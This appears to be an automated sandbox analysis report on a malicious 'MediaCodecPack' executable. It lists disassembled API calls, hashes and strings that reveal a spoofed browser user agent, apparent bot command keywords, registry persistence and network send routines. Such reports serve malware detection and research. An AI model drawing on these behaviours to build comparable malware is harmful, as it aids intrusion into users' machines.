                                                                                • RtlLeaveCriticalSection.NTDLL(02D34FD0), ref: 02D06120
                                                                                  • Part of subcall function 02D127C5: _malloc.LIBCMT ref: 02D127DD
                                                                                • _memset.LIBCMT ref: 02D06480
                                                                                • RtlEnterCriticalSection.NTDLL(02D34FD0), ref: 02D064A3
                                                                                • RtlLeaveCriticalSection.NTDLL(02D34FD0), ref: 02D064B4
                                                                                • _malloc.LIBCMT ref: 02D0653B
                                                                                • RtlEnterCriticalSection.NTDLL(02D34FD0), ref: 02D0654D
                                                                                • RtlLeaveCriticalSection.NTDLL(02D34FD0), ref: 02D06559
                                                                                • _memset.LIBCMT ref: 02D06573
                                                                                • _memset.LIBCMT ref: 02D06582
                                                                                • _memset.LIBCMT ref: 02D06592
                                                                                • _memset.LIBCMT ref: 02D065A1
                                                                                • _memset.LIBCMT ref: 02D065B0
                                                                                • _malloc.LIBCMT ref: 02D0662A
                                                                                • _memset.LIBCMT ref: 02D0663B
                                                                                • _strtok.LIBCMT ref: 02D0665B
                                                                                • _swscanf.LIBCMT ref: 02D06672
                                                                                • _strtok.LIBCMT ref: 02D06689
                                                                                • _free.LIBCMT ref: 02D06695
                                                                                • Sleep.KERNEL32(000007D0), ref: 02D06779
                                                                                • _memset.LIBCMT ref: 02D067F2
                                                                                • RtlEnterCriticalSection.NTDLL(02D34FD0), ref: 02D067FF
                                                                                • RtlLeaveCriticalSection.NTDLL(02D34FD0), ref: 02D06811
                                                                                  • Part of subcall function 02D0873B: __EH_prolog.LIBCMT ref: 02D08740
                                                                                  • Part of subcall function 02D0873B: RtlEnterCriticalSection.NTDLL(00000020), ref: 02D087BB
                                                                                  • Part of subcall function 02D0873B: RtlLeaveCriticalSection.NTDLL(00000020), ref: 02D087D9
                                                                                • _sprintf.LIBCMT ref: 02D0689B
                                                                                • RtlEnterCriticalSection.NTDLL(00000020), ref: 02D06960
                                                                                • RtlLeaveCriticalSection.NTDLL(00000020), ref: 02D06994
                                                                                  • Part of subcall function 02D05C11: _malloc.LIBCMT ref: 02D05C1F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$_memset$EnterLeave$_malloc$Sleep_strtok$H_prolog_free_sprintf_swscanf
                                                                                • String ID: $%d;$<htm$Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$auth_ip$auth_swith$block$connect$disconnect$idle$updips$updurls
                                                                                • API String ID: 3337033272-2823103634
                                                                                • Opcode ID: 9f82c2e4ea22b7ec837440fbffef114cad0af33e7eeb91ea3afd2faf8eda8aa8
                                                                                • Instruction ID: 3fe8e6fb2bd157b0ff9249ee85ddce8780aac64f0d709569acb32d05eccd6923
                                                                                • Opcode Fuzzy Hash: 9f82c2e4ea22b7ec837440fbffef114cad0af33e7eeb91ea3afd2faf8eda8aa8
                                                                                • Instruction Fuzzy Hash: DD1223315483819BE7359B24E890BAFB7E9EFC5318F14481DE589877E1DB709C08CBA2

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02D01D11
                                                                                • GetLastError.KERNEL32 ref: 02D01D23
                                                                                  • Part of subcall function 02D01712: __EH_prolog.LIBCMT ref: 02D01717
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02D01D59
                                                                                • GetLastError.KERNEL32 ref: 02D01D6B
                                                                                • __beginthreadex.LIBCMT ref: 02D01DB1
                                                                                • GetLastError.KERNEL32 ref: 02D01DC6
                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D01DDD
                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D01DEC
                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D01E14
                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D01E1B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseErrorHandleLast$CreateEvent$H_prologObjectSingleWait__beginthreadex
                                                                                • String ID: thread$thread.entry_event$thread.exit_event
                                                                                • API String ID: 831262434-3017686385
                                                                                • Opcode ID: e05115f24cbbe98a7ee3b5c02b04cf28dfa4bd6a5739515501e2938392e192d2
                                                                                • Instruction ID: 6311895c399d0e5cbd4e2a5bb21212539e2f65e22fa786a886dc653dd3a2c729
                                                                                • Opcode Fuzzy Hash: e05115f24cbbe98a7ee3b5c02b04cf28dfa4bd6a5739515501e2938392e192d2
                                                                                • Instruction Fuzzy Hash: 15316771A003019FD710EF24D888B2BBBA5EF84750F204969F8598B3A0DB70DC49CFA2

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D04D8B
                                                                                • RtlEnterCriticalSection.NTDLL(02D34FD0), ref: 02D04DB7
                                                                                • RtlLeaveCriticalSection.NTDLL(02D34FD0), ref: 02D04DC3
                                                                                  • Part of subcall function 02D04BED: __EH_prolog.LIBCMT ref: 02D04BF2
                                                                                  • Part of subcall function 02D04BED: InterlockedExchange.KERNEL32(?,00000000), ref: 02D04CF2
                                                                                • RtlEnterCriticalSection.NTDLL(02D34FD0), ref: 02D04E93
                                                                                • RtlLeaveCriticalSection.NTDLL(02D34FD0), ref: 02D04E99
                                                                                • RtlEnterCriticalSection.NTDLL(02D34FD0), ref: 02D04EA0
                                                                                • RtlLeaveCriticalSection.NTDLL(02D34FD0), ref: 02D04EA6
                                                                                • RtlEnterCriticalSection.NTDLL(02D34FD0), ref: 02D050A7
                                                                                • RtlLeaveCriticalSection.NTDLL(02D34FD0), ref: 02D050AD
                                                                                • RtlEnterCriticalSection.NTDLL(02D34FD0), ref: 02D050B8
                                                                                • RtlLeaveCriticalSection.NTDLL(02D34FD0), ref: 02D050C1
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterLeave$H_prolog$ExchangeInterlocked
                                                                                • String ID:
                                                                                • API String ID: 2062355503-0
                                                                                • Opcode ID: b05f6bcd66ae18ef7c9654cd26d6502658de061f7b8e983614f219388c18e583
                                                                                • Instruction ID: 90b3c5d75af9a7c42a4dca3d509e61ee09614d58600bb8c234fdce4a2fc3c448
                                                                                • Opcode Fuzzy Hash: b05f6bcd66ae18ef7c9654cd26d6502658de061f7b8e983614f219388c18e583
                                                                                • Instruction Fuzzy Hash: D8B14A71D0421D9FEF25DFA0D890BEEBBB5EF04318F24405AE81566290DBB45E49CFA1

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • FindResourceA.KERNEL32(?,0000000A), ref: 00401351
                                                                                • SizeofResource.KERNEL32(00000000), ref: 00401370
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2567390961.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.2567390961.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: Resource$FindSizeof
                                                                                • String ID:
                                                                                • API String ID: 3019604839-3916222277
                                                                                • Opcode ID: d05602b0e20a881077e161112d5bd34232c8f71c7560e683aad862cf59917e15
                                                                                • Instruction ID: 779852d327d389dbbb2f1b261a2bb7141e3a4eae573781fe7d13a424a4f3f89b
                                                                                • Opcode Fuzzy Hash: d05602b0e20a881077e161112d5bd34232c8f71c7560e683aad862cf59917e15
                                                                                • Instruction Fuzzy Hash: F1811075D04258DFDF01CFE8D985AEEBBB0BF09305F1400AAE581B7262C3385A84DB69

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • RtlEnterCriticalSection.NTDLL(?), ref: 02D02706
                                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02D0272B
                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02D23173), ref: 02D02738
                                                                                  • Part of subcall function 02D01712: __EH_prolog.LIBCMT ref: 02D01717
                                                                                • SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 02D02778
                                                                                • RtlLeaveCriticalSection.NTDLL(?), ref: 02D027D9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                                • String ID: timer
                                                                                • API String ID: 4293676635-1792073242
                                                                                • Opcode ID: 8f51ef5159fd5189b3b12bf0f472f90af73f4909c5e9ae176deb8a75fd3b73a5
                                                                                • Instruction ID: 428126473e184f2cd866cc0160862e9c85a41ba93649291c4239bceaca6d7d8a
                                                                                • Opcode Fuzzy Hash: 8f51ef5159fd5189b3b12bf0f472f90af73f4909c5e9ae176deb8a75fd3b73a5
                                                                                • Instruction Fuzzy Hash: 6B319CB1805715AFD310DF25E988B26BBA8FB88725F104A2EF85582B90D770EC14CFA5

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2567390961.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.2567390961.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID: Curr$entV$ersi$on\R$ows\
                                                                                • API String ID: 1029625771-1474489434
                                                                                • Opcode ID: f444551602b2b86e4a4a20a609321a93c0450eb734b73b7cbcf43e92de4f6f8f
                                                                                • Instruction ID: f023023372e99afa5c1116a4d80dcbe190962e31142eb026a9c01bd4ea8a2df4
                                                                                • Opcode Fuzzy Hash: f444551602b2b86e4a4a20a609321a93c0450eb734b73b7cbcf43e92de4f6f8f
                                                                                • Instruction Fuzzy Hash: 9D219270D14625CFCB04DFA8CD85AEDB7B1BB05B00F14856AE0127B7E1C378A842DB4A

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D01BAC
                                                                                • RtlEnterCriticalSection.NTDLL ref: 02D01BBC
                                                                                • RtlLeaveCriticalSection.NTDLL ref: 02D01BEA
                                                                                • RtlEnterCriticalSection.NTDLL ref: 02D01C13
                                                                                • RtlLeaveCriticalSection.NTDLL ref: 02D01C56
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterLeave$H_prolog
                                                                                • String ID:
                                                                                • API String ID: 1633115879-0
                                                                                • Opcode ID: fe3bc1df7315055b2453046bdc45cd5239903debea9cd8cf42f5a026c45ce903
                                                                                • Instruction ID: 8987da278a5e9efdab85a499f483ae00d0b450cdc4555328a8e5e6d05366befc
                                                                                • Opcode Fuzzy Hash: fe3bc1df7315055b2453046bdc45cd5239903debea9cd8cf42f5a026c45ce903
                                                                                • Instruction Fuzzy Hash: 4321CA71A002049FCB14CF68D884BAABBB5FF48724F218549E80997340D771ED09CBE0

                                                                                Control-flow Graph

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2567390961.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.2567390961.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: KCU:$h "H
                                                                                • API String ID: 0-3841667563
                                                                                • Opcode ID: 70e05740465bff6623fe55717a1e0cb7cab08e4fdb1563974d3bfdd56af563f9
                                                                                • Instruction ID: 63b4f081242afd7d5de53f06e14c51bfbfcc0f1bc0993d0d4b68f313483703d4
                                                                                • Opcode Fuzzy Hash: 70e05740465bff6623fe55717a1e0cb7cab08e4fdb1563974d3bfdd56af563f9
                                                                                • Instruction Fuzzy Hash: 25112971848212DFD3124F909B592A677B1EB12300F24543B8582AB2D2C2BD4A4BD78F

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • Sleep.KERNELBASE(0000EA60), ref: 02D06104
                                                                                • RtlEnterCriticalSection.NTDLL(02D34FD0), ref: 02D0610F
                                                                                • RtlLeaveCriticalSection.NTDLL(02D34FD0), ref: 02D06120
                                                                                Strings
                                                                                • Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US), xrefs: 02D06129
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterLeaveSleep
                                                                                • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                • API String ID: 1566154052-1923541051
                                                                                • Opcode ID: 670ea56000eab9fa923fa3ab367a6cbb117a67ca94bb37b67e053ea576176aed
                                                                                • Instruction ID: 65f5fe46cb6affa6cc51aa4e466bdf616f1c285f5a7376cef753a27859178b9c
                                                                                • Opcode Fuzzy Hash: 670ea56000eab9fa923fa3ab367a6cbb117a67ca94bb37b67e053ea576176aed
                                                                                • Instruction Fuzzy Hash: E3F0282188C3C08FD7038770BC58B653F706F5B214B0A04C7E4C59B393C1985C19C3A2

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetVersion.KERNEL32 ref: 00402A46
                                                                                  • Part of subcall function 00403B64: HeapCreate.KERNELBASE(00000000,00001000,00000000,00402A7F,00000000), ref: 00403B75
                                                                                  • Part of subcall function 00403B64: HeapDestroy.KERNEL32 ref: 00403BB4
                                                                                • GetCommandLineA.KERNEL32 ref: 00402A94
                                                                                • GetStartupInfoA.KERNEL32(?), ref: 00402ABF
                                                                                • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00402AE2
                                                                                  • Part of subcall function 00402B3B: ExitProcess.KERNEL32 ref: 00402B58
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2567390961.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.2567390961.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                                                                                • String ID:
                                                                                • API String ID: 2057626494-0
                                                                                • Opcode ID: 81c04d43b3f46c58329c6832fe0805ef85b64df99fa32ea28edf2ad19d5a1781
                                                                                • Instruction ID: 5f87248e4510ca7a7a053da507506fe2897125482441b09741c869e2758f94b2
                                                                                • Opcode Fuzzy Hash: 81c04d43b3f46c58329c6832fe0805ef85b64df99fa32ea28edf2ad19d5a1781
                                                                                • Instruction Fuzzy Hash: BA214CB19006159ADB04AFA6DE49A6E7FA8EB04715F10413FF905BB2D1DB384900CA6C
                                                                                APIs
                                                                                • WSASetLastError.WS2_32(00000000), ref: 02D02EEE
                                                                                • WSASocketA.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02D02EFD
                                                                                • WSAGetLastError.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02D02F0C
                                                                                • setsockopt.WS2_32(00000000,00000029,0000001B,00000000,00000004), ref: 02D02F36
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$Socketsetsockopt
                                                                                • String ID:
                                                                                • API String ID: 2093263913-0
                                                                                • Opcode ID: 8f057ca1020cec8827ce8d0ff83b6db77ef6c77baeea551aa78032606f323ddd
                                                                                • Instruction ID: 7d4a8d4c1bfb36ca5cce7ba82b3056fc202a4d0f14d51e238c70713616e69c0e
                                                                                • Opcode Fuzzy Hash: 8f057ca1020cec8827ce8d0ff83b6db77ef6c77baeea551aa78032606f323ddd
                                                                                • Instruction Fuzzy Hash: E201B171A01214BBDB309F66DC88F9BBBA9EB85771F008565F918CB290CB708C00CBA0
                                                                                APIs
                                                                                  • Part of subcall function 02D02D39: WSASetLastError.WS2_32(00000000), ref: 02D02D47
                                                                                  • Part of subcall function 02D02D39: WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 02D02D5C
                                                                                • WSASetLastError.WS2_32(00000000), ref: 02D02E6D
                                                                                • select.WS2_32(?,00000000,00000001,00000000,00000000), ref: 02D02E83
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$Sendselect
                                                                                • String ID: 3'
                                                                                • API String ID: 2958345159-280543908
                                                                                • Opcode ID: 8c700fdc4cd78ec1d240b8db9553ec3c85fbcf24b6b7a7e9098d51b3fa3666e8
                                                                                • Instruction ID: 038045d8e0538874623acb8d9842fbc0b394119dbddeb2477b56d4b06765c1ff
                                                                                • Opcode Fuzzy Hash: 8c700fdc4cd78ec1d240b8db9553ec3c85fbcf24b6b7a7e9098d51b3fa3666e8
                                                                                • Instruction Fuzzy Hash: E23169B0A022099EDB10AFA0D89C7EEBBAAEF04354F10455A9C14973E0EB749D54CFA0
                                                                                APIs
                                                                                • WSASetLastError.WS2_32(00000000), ref: 02D02AEA
                                                                                • connect.WS2_32(?,?,?), ref: 02D02AF5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLastconnect
                                                                                • String ID: 3'
                                                                                • API String ID: 374722065-280543908
                                                                                • Opcode ID: 43b5ff4b84a55ef060bca43ab5b7eead08e53536f96e862d1657252bb8f9c062
                                                                                • Instruction ID: e71c282910dca67e966636f979866742bf19371fb93042c17ba4e0a7f0124af9
                                                                                • Opcode Fuzzy Hash: 43b5ff4b84a55ef060bca43ab5b7eead08e53536f96e862d1657252bb8f9c062
                                                                                • Instruction Fuzzy Hash: F8218374E01204ABCF24AFA4D4987AEBBBAEF44324F504199DC18973D0DB744E05CFA1
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog
                                                                                • String ID:
                                                                                • API String ID: 3519838083-0
                                                                                • Opcode ID: 4b6cdcea9a2a0c4e466e09cace54aa436c3c3068eb854c73d0ee2064a8c6d930
                                                                                • Instruction ID: c40a0c48c868d3eef360340e265be7c9cbd2e7ecc721d5a9bc0f63eee5d74269
                                                                                • Opcode Fuzzy Hash: 4b6cdcea9a2a0c4e466e09cace54aa436c3c3068eb854c73d0ee2064a8c6d930
                                                                                • Instruction Fuzzy Hash: 15513A71904256DFCB58DF68D5957AABBB1FF08320F10819AE8699B3A0D774DD10CFA0
                                                                                APIs
                                                                                Strings
                                                                                • C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe, xrefs: 0040D655
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2567390961.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.2567390961.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: lstrcmpi
                                                                                • String ID: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                                • API String ID: 1586166983-3897538755
                                                                                • Opcode ID: 17134def4ae493ed892da5cf1e4e02e31044a7d05c58cb64cc9be4b1d3063305
                                                                                • Instruction ID: 16557cb42895348a952eaf9991b4a66d97034997999308634aca6265cd08f949
                                                                                • Opcode Fuzzy Hash: 17134def4ae493ed892da5cf1e4e02e31044a7d05c58cb64cc9be4b1d3063305
                                                                                • Instruction Fuzzy Hash: E321BB326041618FC7219B69D985BE5BBB0EF0131076844BBE086F71E2D339D907DB8A
                                                                                APIs
                                                                                • InterlockedIncrement.KERNEL32(?), ref: 02D036A7
                                                                                  • Part of subcall function 02D02420: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02D02432
                                                                                  • Part of subcall function 02D02420: PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02D02445
                                                                                  • Part of subcall function 02D02420: RtlEnterCriticalSection.NTDLL(?), ref: 02D02454
                                                                                  • Part of subcall function 02D02420: InterlockedExchange.KERNEL32(?,00000001), ref: 02D02469
                                                                                  • Part of subcall function 02D02420: RtlLeaveCriticalSection.NTDLL(?), ref: 02D02470
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Interlocked$CriticalExchangeSection$CompareCompletionEnterIncrementLeavePostQueuedStatus
                                                                                • String ID:
                                                                                • API String ID: 1601054111-0
                                                                                APIs
                                                                                • __beginthreadex.LIBCMT ref: 02D11116
                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,00000002,02D0998D,00000000), ref: 02D11147
                                                                                • ResumeThread.KERNELBASE(?,?,?,?,?,00000002,02D0998D,00000000), ref: 02D11155
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseHandleResumeThread__beginthreadex
                                                                                • String ID:
                                                                                • API String ID: 1685284544-0
                                                                                APIs
                                                                                • InterlockedIncrement.KERNEL32(02D3529C), ref: 02D01ABA
                                                                                • WSAStartup.WS2_32(00000002,00000000), ref: 02D01ACB
                                                                                • InterlockedExchange.KERNEL32(02D352A0,00000000), ref: 02D01AD7
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Interlocked$ExchangeIncrementStartup
                                                                                • String ID:
                                                                                • API String ID: 1856147945-0
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D38000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D38000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d38000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: InternetOpen
                                                                                • String ID: U[6
                                                                                • API String ID: 2038078732-2089642770
                                                                                APIs
                                                                                • OpenSCManagerA.ADVAPI32(?,?,00000002), ref: 0040D955
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2567390961.000000000040B000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000003.00000002.2567390961.0000000000400000.00000040.00000001.01000000.00000009.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: ManagerOpen
                                                                                • String ID: \
                                                                                • API String ID: 1889721586-2967466578
                                                                                APIs
                                                                                • OpenSCManagerA.ADVAPI32(?,?,00000002), ref: 0040D955
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2567390961.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000003.00000002.2567390961.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: ManagerOpen
                                                                                • String ID: \
                                                                                • API String ID: 1889721586-2967466578
                                                                                APIs
                                                                                • RegSetValueExA.KERNELBASE(?,media_codec_pack_i54,00000000,00000004), ref: 0040D0C4
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2567390961.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000003.00000002.2567390961.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: Value
                                                                                • String ID: media_codec_pack_i54
                                                                                • API String ID: 3702945584-2191737078
                                                                                APIs
                                                                                • RegQueryValueExA.KERNELBASE(?,Common AppData), ref: 0040DD69
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2567390961.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000003.00000002.2567390961.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: QueryValue
                                                                                • String ID: Common AppData
                                                                                • API String ID: 3660427363-2574214464
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D04BF2
                                                                                  • Part of subcall function 02D01BA7: __EH_prolog.LIBCMT ref: 02D01BAC
                                                                                  • Part of subcall function 02D01BA7: RtlEnterCriticalSection.NTDLL ref: 02D01BBC
                                                                                  • Part of subcall function 02D01BA7: RtlLeaveCriticalSection.NTDLL ref: 02D01BEA
                                                                                  • Part of subcall function 02D01BA7: RtlEnterCriticalSection.NTDLL ref: 02D01C13
                                                                                  • Part of subcall function 02D01BA7: RtlLeaveCriticalSection.NTDLL ref: 02D01C56
                                                                                  • Part of subcall function 02D0D0FC: __EH_prolog.LIBCMT ref: 02D0D101
                                                                                  • Part of subcall function 02D0D0FC: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D0D180
                                                                                • InterlockedExchange.KERNEL32(?,00000000), ref: 02D04CF2
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$H_prolog$EnterExchangeInterlockedLeave
                                                                                • String ID:
                                                                                • API String ID: 1927618982-0
                                                                                APIs
                                                                                • WSASetLastError.WS2_32(00000000), ref: 02D02D47
                                                                                • WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 02D02D5C
                                                                                  • Part of subcall function 02D0950D: WSAGetLastError.WS2_32(00000000,?,?,02D02A51), ref: 02D0951B
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
